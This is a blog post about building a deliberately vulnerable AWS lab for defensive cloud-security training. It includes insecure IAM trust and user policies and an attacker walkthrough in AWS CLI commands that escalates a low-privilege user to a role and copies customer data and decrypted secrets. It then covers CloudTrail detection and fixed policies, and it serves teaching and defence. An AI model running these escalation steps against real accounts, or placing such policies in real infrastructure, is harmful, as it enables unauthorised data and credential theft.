DEV Community

Karan Vaghela

Building an Intentionally Vulnerable AWS Lab to Teach Cloud Security

Introduction

Most cloud engineers learn AWS by building functional infrastructure: deploying EC2 instances, configuring S3 buckets, setting up VPCs. They pass certification exams that test theoretical knowledge of IAM policies and security groups. But they rarely see how attackers actually exploit cloud environments.

This gap is dangerous. Real-world cloud breaches don't happen because engineers forget to enable encryption. They happen because of subtle misconfigurations in IAM policies, overly permissive roles, and broken trust boundaries that look reasonable at first glance but create exploitable attack paths.

Intentionally vulnerable labs solve this problem. By building AWS environments with realistic security flaws, we can teach defenders what attackers see, how privilege escalation actually works, and why certain IAM patterns are toxic. This isn't about learning to attack; it's about understanding the mechanics of cloud security failures so you can prevent them.

The common problem: you can read documentation about IAM wildcards being dangerous, or you can actually exploit an overly permissive policy and watch yourself gain admin access from a low-privilege starting point. One of these teaches you how to secure AWS. The other just tells you to.
Lab Architecture Overview

This lab simulates a small development environment with a web application backend. The architecture includes common AWS services with deliberately introduced weaknesses that mirror real-world misconfigurations.

Trust Boundaries:

IAM user → IAM role assumption (vulnerable boundary)
Public subnet → Private subnet (network boundary)
EC2 instance → S3 bucket (service boundary)

Attack Surface:

IAM policies allowing unintended role assumption
EC2 instance metadata service (IMDSv1)
Overly permissive S3 bucket policies
CloudTrail logs accessible to unauthorized principals

AWS Services Used

IAM (Identity and Access Management)

Core authentication and authorization mechanism
Policies determine who can do what
Many publicly reported cloud breaches involve IAM misconfiguration, which makes IAM central to security learning

EC2 (Elastic Compute Cloud)

Represents compute resources with attached IAM roles
Instance metadata service is a common attack vector
Demonstrates how compromised instances lead to credential exposure

S3 (Simple Storage Service)

Holds sensitive application data (simulated customer records, config files)
Misconfigured bucket policies are among the most common cloud vulnerabilities
Teaches object-level access controls and bucket permissions

CloudTrail

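Logs AWS API calls for auditing and forensics (management events by default; S3 object-level data events such as GetObject must be enabled explicitly)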
Essential for detection and incident response
Demonstrates what attackers leave behind and how defenders investigate

VPC (Virtual Private Cloud)

Network isolation and segmentation
Security groups and NACLs control traffic flow
Shows relationship between network security and identity-based security

Systems Manager (SSM)

Parameter Store can hold secrets and configuration
Often misconfigured to allow unauthorized access
Demonstrates lateral movement paths through configuration services

Secrets Manager (optional)

Stores sensitive credentials with rotation capabilities
When misconfigured, becomes a treasure trove for attackers
Shows the difference between encrypted storage and access control

Intentional IAM Misconfigurations

The core vulnerability in this lab is an IAM trust policy that allows unintended role assumption. This mirrors a common real-world pattern where developers create roles for specific services but accidentally make them assumable by broader principals.

Vulnerable IAM Role: app-role

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123456789012:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Why This Is Dangerous:

Using the account root ARN (arn:aws:iam::ACCOUNT_ID:root) in a trust policy does not restrict the role to the root user. It delegates the trust decision to the whole account: any IAM user or role in that account whose identity-based policy allows sts:AssumeRole on this role can assume it. This is a subtle but critical misunderstanding. Developers often think they're restricting access to the root user, but they're actually opening the role to every principal in the account that holds that permission.
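To make the root-ARN pitfall concrete, here is a minimal Python sketch that scans a trust policy for account-root principals. The function name account_root_principals is hypothetical, and the check is deliberately narrow: it only recognizes the arn:aws:iam::ACCOUNT_ID:root form and ignores conditions, so treat it as an illustration rather than a complete linter.

```python
import re

# Matches the account-root principal form used in the vulnerable trust policy.
ROOT_ARN = re.compile(r"^arn:aws:iam::(\d{12}):root$")


def account_root_principals(trust_policy):
    """Return the account IDs that an Allow statement trusts via the :root ARN."""
    trusted = []
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if not isinstance(principal, dict):
            continue  # a bare "*" principal is a different problem, not handled here
        aws = principal.get("AWS", [])
        if isinstance(aws, str):
            aws = [aws]
        for arn in aws:
            match = ROOT_ARN.match(arn)
            if match:
                trusted.append(match.group(1))
    return trusted


# The vulnerable app-role trust policy from this lab.
vulnerable = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
        "Action": "sts:AssumeRole",
    }],
}

print(account_root_principals(vulnerable))  # ['123456789012']
```

A non-empty result means the role is open to every principal in the listed account that holds sts:AssumeRole, which is exactly the condition the lab exploits.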
The role's permission policy grants extensive S3 access:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:PutObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::app-data-prod",
        "arn:aws:s3:::app-data-prod/*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": [
        "ssm:GetParameter",
        "ssm:GetParameters"
      ],
      "Resource": "arn:aws:ssm:us-east-1:123456789012:parameter/app/*"
    }
  ]
}

Additional Misconfiguration: DevUser Policy
The DevUser is intended to have limited read-only access but has this policy attached:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:ListRoles",
        "iam:GetRole",
        "sts:AssumeRole"
      ],
      "Resource": "*"
    },
    {
      "Effect": "Allow",
      "Action": [
        "ec2:DescribeInstances",
        "s3:ListAllMyBuckets"
      ],
      "Resource": "*"
    }
  ]
}

The problem: DevUser can list all roles and assume any role that trusts the account. Combined with the vulnerable trust policy on app-role, this creates a privilege escalation path.
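The way the two policies combine can be sketched in a few lines of Python. This is a simplified model, not the real IAM evaluation engine: it ignores explicit denies, conditions, permission boundaries, and SCPs, and the helper names (identity_allows_assume, trust_allows_account, escalation_path) are hypothetical. Wildcards are approximated with fnmatch.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    """IAM allows a string or a list in most fields; normalize to a list."""
    return value if isinstance(value, list) else [value]


def identity_allows_assume(identity_policy, role_arn):
    """True if any Allow statement grants sts:AssumeRole on role_arn."""
    for stmt in _as_list(identity_policy["Statement"]):
        if stmt["Effect"] != "Allow":
            continue
        # IAM action names are case-insensitive, so compare in lower case.
        action_ok = any(fnmatchcase("sts:assumerole", a.lower())
                        for a in _as_list(stmt["Action"]))
        resource_ok = any(fnmatchcase(role_arn, r)
                          for r in _as_list(stmt["Resource"]))
        if action_ok and resource_ok:
            return True
    return False


def trust_allows_account(trust_policy, account_id):
    """True if the trust policy trusts the whole account via the :root ARN."""
    root = f"arn:aws:iam::{account_id}:root"
    for stmt in _as_list(trust_policy["Statement"]):
        principal = stmt.get("Principal", {})
        if stmt["Effect"] == "Allow" and isinstance(principal, dict):
            if root in _as_list(principal.get("AWS", [])):
                return True
    return False


def escalation_path(identity_policy, trust_policy, account_id, role_arn):
    """Both halves must hold: the caller may ask, and the role says yes."""
    return (identity_allows_assume(identity_policy, role_arn)
            and trust_allows_account(trust_policy, account_id))


devuser_policy = {"Statement": [
    {"Effect": "Allow",
     "Action": ["iam:ListRoles", "iam:GetRole", "sts:AssumeRole"],
     "Resource": "*"},
]}
app_role_trust = {"Statement": [
    {"Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
     "Action": "sts:AssumeRole"},
]}

print(escalation_path(devuser_policy, app_role_trust, "123456789012",
                      "arn:aws:iam::123456789012:role/app-role"))  # True
```

Neither policy is flagged on its own; the path only appears when both checks are evaluated together, which is why reviewing policies one at a time tends to miss it.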
Attacker's Perspective (Red Team View)

⚠️ LAB ENVIRONMENT ONLY - DO NOT USE ON PRODUCTION OR UNAUTHORIZED SYSTEMS ⚠️

Starting Point: Compromised DevUser credentials (leaked in code repository, phished, etc.)

Step 1: Enumerate IAM Roles
# List all roles in the account
aws iam list-roles --profile devuser

# Get details about interesting roles
aws iam get-role --role-name app-role --profile devuser

The attacker discovers app-role and examines its trust policy. They notice the trust policy allows any principal in the account to assume it.
Step 2: Check Current Identity
# Confirm current identity
aws sts get-caller-identity --profile devuser

Output:

{
     "UserId": "AIDAI4EXAMPLE",
     "Account": "123456789012",
     "Arn": "arn:aws:iam::123456789012:user/DevUser"
}

Step 3: Assume the Privileged Role

# Assume app-role
aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/app-role \
  --role-session-name attacker-session \
  --profile devuser


Output includes temporary credentials:

 {
   "Credentials": {
        "AccessKeyId": "ASIAXXX",
        "SecretAccessKey": "xxx",
        "SessionToken": "xxx",
        "Expiration": "2025-12-21T22:00:00Z"
    }
 }

Step 4: Configure Temporary Credentials

# Export the temporary credentials
export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"

# Verify new identity
aws sts get-caller-identity

# Output:
# {
#     "UserId": "AROAXXXXX:attacker-session",
#     "Account": "123456789012",
#     "Arn": "arn:aws:sts::123456789012:assumed-role/app-role/attacker-session"
# }
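Copying three values by hand is error-prone, so in the lab it can help to generate the export lines from the assume-role output. The following Python sketch does that; the function name export_lines is hypothetical, and the sample output reuses the placeholder values shown in Step 3.

```python
import json
import shlex


def export_lines(assume_role_output):
    """Turn `aws sts assume-role` JSON output into shell export statements."""
    creds = json.loads(assume_role_output)["Credentials"]
    mapping = {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["SessionToken"],
    }
    # shlex.quote protects values that contain shell metacharacters.
    return [f"export {name}={shlex.quote(value)}" for name, value in mapping.items()]


sample_output = """
{
  "Credentials": {
    "AccessKeyId": "ASIAXXX",
    "SecretAccessKey": "xxx",
    "SessionToken": "xxx",
    "Expiration": "2025-12-21T22:00:00Z"
  }
}
"""

for line in export_lines(sample_output):
    print(line)
```

The Expiration field is left out on purpose: the CLI reads only the three variables above, and the session simply stops working once the expiry time passes.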

Step 5: Access Sensitive Data

# List objects in the production bucket
aws s3 ls s3://app-data-prod/

# Download sensitive files
aws s3 cp s3://app-data-prod/customer-data.csv .
aws s3 cp s3://app-data-prod/api-keys.json .

# Retrieve secrets from Parameter Store
aws ssm get-parameter --name /app/database-password --with-decryption
aws ssm get-parameter --name /app/api-key --with-decryption

Attack Path Summary:

Low-privilege DevUser → Enumerate IAM roles
Discover app-role with misconfigured trust policy
Assume app-role using STS
Access production S3 bucket and SSM parameters with elevated privileges
Exfiltrate sensitive data

What Makes This Realistic:

Developers commonly misunderstand IAM trust policy syntax
Low-privilege accounts often have sts:AssumeRole for legitimate reasons
The escalation path isn't obvious from any single policy; it requires combining permissions
No alerts fire because the role assumption is technically authorized

Defender's Perspective (Blue Team View)

Detection Strategy:
CloudTrail logs contain all the evidence needed to detect this attack. The key is knowing what to look for.

Indicator 1: Role Enumeration

{
  "eventName": "GetRole",
  "eventTime": "2025-12-21T18:23:45Z",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDAI4EXAMPLE",
    "arn": "arn:aws:iam::123456789012:user/DevUser",
    "accountId": "123456789012",
    "userName": "DevUser"
  },
  "requestParameters": {
    "roleName": "app-role"
  },
  "sourceIPAddress": "203.0.113.45"
}

Why This Matters: DevUser listing and examining roles, especially those it shouldn't need to know about, is suspicious. Most users don't enumerate IAM roles unless they're investigating privilege escalation paths.
Indicator 2: Unusual AssumeRole Activity

{
  "eventName": "AssumeRole",
  "eventTime": "2025-12-21T18:24:12Z",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDAI4EXAMPLE",
    "arn": "arn:aws:iam::123456789012:user/DevUser",
    "accountId": "123456789012",
    "userName": "DevUser"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::123456789012:role/app-role",
    "roleSessionName": "attacker-session"
  },
  "resources": [
    {
      "type": "AWS::IAM::Role",
      "ARN": "arn:aws:iam::123456789012:role/app-role"
    }
  ]
}

Why This Matters: DevUser has never assumed this role before. Baseline behavior analysis would flag this as anomalous. Additionally, the session name "attacker-session" is obviously suspicious (though real attackers would use something more innocuous).
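The "never assumed this role before" check is simple to prototype. The Python sketch below compares recent AssumeRole events against a baseline of (caller, role) pairs. It assumes the events are already parsed CloudTrail records shaped like the examples in this post; the function name new_role_assumptions and the readonly-role ARN in the baseline are hypothetical.

```python
def new_role_assumptions(baseline_events, recent_events):
    """Return recent AssumeRole events whose (caller, role) pair is not in the baseline."""

    def is_assume(event):
        return event.get("eventName") == "AssumeRole"

    def pair(event):
        return (event["userIdentity"]["arn"], event["requestParameters"]["roleArn"])

    seen = {pair(e) for e in baseline_events if is_assume(e)}
    return [e for e in recent_events if is_assume(e) and pair(e) not in seen]


dev_user = "arn:aws:iam::123456789012:user/DevUser"

# Hypothetical history: DevUser has only ever assumed a read-only role.
baseline = [{
    "eventName": "AssumeRole",
    "userIdentity": {"arn": dev_user},
    "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/readonly-role"},
}]

# The event from Indicator 2.
recent = [{
    "eventName": "AssumeRole",
    "userIdentity": {"arn": dev_user},
    "requestParameters": {
        "roleArn": "arn:aws:iam::123456789012:role/app-role",
        "roleSessionName": "attacker-session",
    },
}]

for event in new_role_assumptions(baseline, recent):
    print(event["requestParameters"]["roleArn"])
```

A real baseline would need a time window and some tolerance for legitimate new access, but even this naive version surfaces the lab attack without relying on the session name.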
Indicator 3: S3 Access from New Principal

{
  "eventName": "GetObject",
  "eventTime": "2025-12-21T18:25:33Z",
  "userIdentity": {
    "type": "AssumedRole",
    "principalId": "AROAXXXXX:attacker-session",
    "arn": "arn:aws:sts::123456789012:assumed-role/app-role/attacker-session",
    "accountId": "123456789012",
    "sessionContext": {
      "sessionIssuer": {
        "type": "Role",
        "principalId": "AROAXXXXX",
        "arn": "arn:aws:iam::123456789012:role/app-role",
        "accountId": "123456789012",
        "userName": "app-role"
      }
    }
  },
  "requestParameters": {
    "bucketName": "app-data-prod",
    "key": "customer-data.csv"
  }
}

Why This Matters: The app-role is typically assumed by EC2 instances, not by IAM users. Seeing an IAM user assume this role and immediately access sensitive S3 objects is highly anomalous.

Detection Implementation:

CloudWatch Logs Insights Query:

fields @timestamp, userIdentity.userName, eventName, requestParameters.roleArn
| filter eventName = "AssumeRole"
| filter userIdentity.type = "IAMUser"
| filter requestParameters.roleArn like /app-role/
| sort @timestamp desc

GuardDuty Finding:
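GuardDuty has no built-in finding that maps directly to this pattern. Policy:IAMUser/RootCredentialUsage, for example, fires on use of root user credentials, which is not what happens here. Its anomaly-based IAM findings, such as Discovery:IAMUser/AnomalousBehavior or PrivilegeEscalation:IAMUser/AnomalousBehavior, may flag the unusual enumeration and role assumption, depending on the behavior baseline GuardDuty has learned for the account.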
Manual Detection Checklist:

IAM users assuming roles they've never used before
Multiple GetRole calls before an AssumeRole
Access to S3 buckets from principals that don't normally access them
SSM parameter retrieval outside of normal application patterns
Source IP addresses from unexpected regions or ASNs
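The second checklist item, enumeration followed by role assumption, can be expressed as a small correlation over CloudTrail events. This Python sketch is one possible approach under stated assumptions: events are already parsed into dictionaries, the ten-minute window is an arbitrary choice, and the function name enumeration_then_assume is hypothetical.

```python
from datetime import datetime, timedelta

# Read-only IAM calls that the attacker used to discover app-role.
ENUMERATION_EVENTS = {"ListRoles", "GetRole"}


def parse_time(value):
    """CloudTrail eventTime is ISO 8601 in UTC, e.g. 2025-12-21T18:23:45Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def enumeration_then_assume(events, window=timedelta(minutes=10)):
    """Return AssumeRole events that follow role enumeration by the same principal."""
    last_enum = {}  # principal ARN -> time of most recent enumeration call
    flagged = []
    for event in sorted(events, key=lambda e: parse_time(e["eventTime"])):
        arn = event["userIdentity"]["arn"]
        when = parse_time(event["eventTime"])
        name = event["eventName"]
        if name in ENUMERATION_EVENTS:
            last_enum[arn] = when
        elif name == "AssumeRole" and arn in last_enum:
            if when - last_enum[arn] <= window:
                flagged.append(event)
    return flagged


dev_user = {"arn": "arn:aws:iam::123456789012:user/DevUser"}

# Trimmed versions of the Indicator 1 and Indicator 2 events.
events = [
    {"eventName": "AssumeRole", "eventTime": "2025-12-21T18:24:12Z",
     "userIdentity": dev_user,
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/app-role"}},
    {"eventName": "GetRole", "eventTime": "2025-12-21T18:23:45Z",
     "userIdentity": dev_user,
     "requestParameters": {"roleName": "app-role"}},
]

for hit in enumeration_then_assume(events):
    print(hit["eventTime"], hit["requestParameters"]["roleArn"])
```

In the lab data the two calls are 27 seconds apart, so any window longer than that flags the AssumeRole; tightening or widening the window is a trade-off between noise and missed slow attackers.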

Real-World Detection:
In production environments, this attack is commonly caught by:

UEBA (User and Entity Behavior Analytics) tools that establish baselines
CloudTrail analysis in SIEM platforms (Splunk, Datadog, etc.)
Amazon EventBridge rules matching CloudTrail AssumeRole events from unexpected principals
S3 access logging combined with anomaly detection

The attacker is caught when a security analyst reviews CloudTrail logs and notices the unusual sequence of IAM enumeration → role assumption → sensitive data access from a principal that shouldn't have this access pattern.
Remediation and Secure Design
Fixed IAM Role Trust Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Service": "ec2.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Key Changes:

Principal is now the ec2.amazonaws.com service, not the account root
No sts:ExternalId condition: ExternalId is meant for cross-account access by third parties, and the EC2 service does not supply one, so requiring it would stop instances from assuming the role
Only the EC2 service can assume this role on behalf of instances, not IAM users

Fixed DevUser Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "ec2:DescribeInstances",
        "s3:ListAllMyBuckets"
      ],
      "Resource": "*"
    },
    {
      "Effect": "Deny",
      "Action": [
        "iam:*",
        "sts:AssumeRole"
      ],
      "Resource": "*"
    }
  ]
}

Key Changes:

Removed IAM enumeration permissions
Explicitly deny sts:AssumeRole to prevent role switching
Apply least privilege: grant only the permissions actually needed
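The reason the explicit deny matters is that in IAM evaluation a matching Deny always wins over a matching Allow. The Python sketch below models that rule for a single identity policy. It is a teaching model only: it ignores conditions, resource policies, boundaries, and SCPs, approximates wildcards with fnmatch, and the function name decision is hypothetical.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _matches(stmt, action, resource):
    """True if the statement's Action and Resource patterns cover the request."""
    action_hit = any(fnmatchcase(action.lower(), a.lower())
                     for a in _as_list(stmt["Action"]))
    resource_hit = any(fnmatchcase(resource, r)
                       for r in _as_list(stmt["Resource"]))
    return action_hit and resource_hit


def decision(policy, action, resource):
    """Return 'Deny' (explicit), 'Allow', or 'ImplicitDeny' for one identity policy."""
    effects = [s["Effect"] for s in _as_list(policy["Statement"])
               if _matches(s, action, resource)]
    if "Deny" in effects:
        return "Deny"          # explicit deny overrides any allow
    if "Allow" in effects:
        return "Allow"
    return "ImplicitDeny"      # nothing matched, so the default is deny


# The fixed DevUser policy from this section.
fixed_devuser = {"Statement": [
    {"Effect": "Allow",
     "Action": ["ec2:DescribeInstances", "s3:ListAllMyBuckets"],
     "Resource": "*"},
    {"Effect": "Deny",
     "Action": ["iam:*", "sts:AssumeRole"],
     "Resource": "*"},
]}

role = "arn:aws:iam::123456789012:role/app-role"
print(decision(fixed_devuser, "sts:AssumeRole", role))        # Deny
print(decision(fixed_devuser, "ec2:DescribeInstances", "*"))  # Allow
print(decision(fixed_devuser, "s3:GetObject", "arn:aws:s3:::app-data-prod/x"))  # ImplicitDeny
```

Because the deny is explicit, attaching another policy that allows sts:AssumeRole to DevUser later would not reopen the path; only removing the deny statement would.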

S3 Bucket Policy with Least Privilege:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123456789012:role/app-role"
      },
      "Action": [
        "s3:GetObject",
        "s3:PutObject"
      ],
      "Resource": "arn:aws:s3:::app-data-prod/*",
      "Condition": {
        "StringEquals": {
          "s3:ExistingObjectTag/Environment": "production"
        }
      }
    },
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::app-data-prod",
        "arn:aws:s3:::app-data-prod/*"
      ],
      "Condition": {
        "Bool": {
          "aws:SecureTransport": "false"
        }
      }
    }
  ]
}

AWS-Native Security Controls:

  1. Enable IMDSv2 on EC2 Instances

aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

  2. Use IAM Access Analyzer

# Create analyzer to detect external access
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

  3. Enable GuardDuty

aws guardduty create-detector --enable

  4. Implement SCPs (Service Control Policies)

For organizations with multiple accounts, use SCPs to prevent dangerous IAM patterns:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": [
        "iam:CreateAccessKey",
        "iam:CreateUser"
      ],
      "Resource": "*"
    }
  ]
}
  5. CloudTrail Best Practices

Enable log file validation
Store logs in a separate security account
Enable MFA delete on log bucket
Set up alerts for critical IAM events

Least Privilege Principles Applied:

Service-specific principals: Roles should trust services (like EC2, Lambda), not account root
Condition keys: Add conditions to further restrict when policies apply
Explicit denies: Use deny statements to prevent circumvention
Time-bounded credentials: Use temporary credentials with short expiration
Resource-level permissions: Specify exact resources, avoid wildcards
Regular auditing: Use Access Analyzer and IAM Access Advisor to find unused permissions
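The "avoid wildcards" principle can be turned into a quick review aid. The Python sketch below lists the actions that an Allow statement grants on a bare "*" resource. Some actions do not support resource-level permissions and legitimately need "*", so the sketch takes an exemption set; the three entries in it are an illustrative subset to be checked against the AWS service authorization reference, and the names wildcard_findings and RESOURCE_AGNOSTIC are hypothetical.

```python
# Actions assumed not to support resource-level permissions (illustrative subset).
RESOURCE_AGNOSTIC = {"ec2:DescribeInstances", "s3:ListAllMyBuckets", "iam:ListRoles"}


def wildcard_findings(policy, resource_agnostic=RESOURCE_AGNOSTIC):
    """Return actions allowed on Resource "*" that could be scoped more tightly."""
    findings = []
    for stmt in policy["Statement"]:
        if stmt["Effect"] != "Allow":
            continue
        resources = stmt["Resource"] if isinstance(stmt["Resource"], list) else [stmt["Resource"]]
        actions = stmt["Action"] if isinstance(stmt["Action"], list) else [stmt["Action"]]
        if "*" in resources:
            findings.extend(a for a in actions if a not in resource_agnostic)
    return findings


# The original (vulnerable) DevUser policy from this lab.
devuser_policy = {"Statement": [
    {"Effect": "Allow",
     "Action": ["iam:ListRoles", "iam:GetRole", "sts:AssumeRole"],
     "Resource": "*"},
    {"Effect": "Allow",
     "Action": ["ec2:DescribeInstances", "s3:ListAllMyBuckets"],
     "Resource": "*"},
]}

print(wildcard_findings(devuser_policy))  # ['iam:GetRole', 'sts:AssumeRole']
```

The two flagged actions are the ones the attack path depends on, which is a useful sanity check that the review rule targets the right statements.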

Lessons Learned

  1. IAM Trust Policies Are Not Intuitive
    The biggest lesson: "Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:root"} does not mean "only the root user." It means "any principal in this account." This single misunderstanding causes countless production incidents. You can read this in documentation, but exploiting it in a lab makes it unforgettable.

  2. Enumeration Is the First Step
    Attackers with limited credentials immediately enumerate what's available. They run list-roles, list-users, describe-instances, list-buckets. Defenders need to treat excessive enumeration as a red flag, not normal behavior. Baselines matter.

  3. Privilege Escalation Paths Are Rarely Obvious
    The vulnerable path in this lab requires combining three elements: DevUser's sts:AssumeRole permission, app-role's trust policy, and app-role's S3 permissions. No single policy looks immediately dangerous. Real attacks work the same way: they chain together reasonable-looking permissions into an exploitable path.

  4. Detection Requires Context
    A single AssumeRole call isn't suspicious. An IAM user assuming a role normally used by EC2 instances is suspicious. Good detection isn't about alerting on individual events; it's about understanding normal behavior and flagging deviations.

  5. Least Privilege Is Hard
    Writing the remediated policies takes more effort than writing the vulnerable ones. The secure versions require understanding service principals, condition keys, and resource ARNs. This is why overly permissive policies are so common: they're easier. Labs teach you the cost of taking shortcuts.

  6. Theory vs. Practice Gap
    Reading "don't use wildcards in IAM policies" teaches you little. Exploiting the Resource: "*" on sts:AssumeRole to reach a sensitive S3 bucket teaches you why the rule exists. Building and breaking systems creates understanding that studying alone cannot.

  7. CloudTrail Is Your Forensic Foundation
    Every action in this attack is logged. The evidence is there. But if you don't know what to look for, or if your logs are poorly organized, you won't find it. Effective security requires not just enabling CloudTrail, but actively querying and analyzing it.

  8. Defense in Depth Matters
    The remediation doesn't rely on a single control. It combines fixed trust policies, least privilege IAM policies, S3 bucket policies, GuardDuty, IAM Access Analyzer, and IMDSv2. Layered security means an attacker has to bypass multiple controls, not just one.

What This Lab Teaches That Theory Cannot:

The muscle memory of running AWS CLI commands as an attacker
What CloudTrail logs actually look like during an attack
The psychological experience of privilege escalation (it feels easy, which is alarming)
How to write IAM policies that actually stop these attacks
Why security engineering is about understanding attacker tradecraft

Conclusion

  • Building intentionally vulnerable AWS labs bridges the gap between theoretical cloud security knowledge and practical defensive skills. When you've successfully exploited an IAM misconfiguration yourself, you understand viscerally why certain patterns are dangerous. When you've hunted through CloudTrail logs to detect your own simulated attack, you know what to look for in production.

  • This isn't about learning to be an attacker. It's about thinking like one so you can build defenses that actually work. Cloud security isn't about memorizing AWS documentation; it's about understanding how identity, permissions, and trust boundaries interact in ways that create exploitable paths.

  • The lab environment described here is a starting point. Extend it. Add Lambda functions with overly permissive execution roles. Configure an S3 bucket with public access. Create an EC2 instance with IMDSv1 enabled and credentials in user data. Each vulnerability you add is another lesson for anyone who works through it.

  • Security teams benefit from engineers who understand both offense and defense. DevSecOps teams need people who can review IAM policies and spot privilege escalation risks. Cloud architects need to design systems that are secure by default, not retrofit security later. Labs like this train all of those skills simultaneously.

  • Build these environments in isolated AWS accounts. Document the vulnerabilities. Walk teammates through the exploitation and remediation. Host internal workshops where engineers red team each other's infrastructure. The AWS community grows stronger when we learn from controlled failures rather than production incidents.

  • Responsible experimentation in lab environments is how we develop the expertise to secure production systems. This is ethical learning done right: controlled, educational, and defensive-minded. The goal is never to exploit real systems. It's to understand exploitation well enough that you can prevent it.
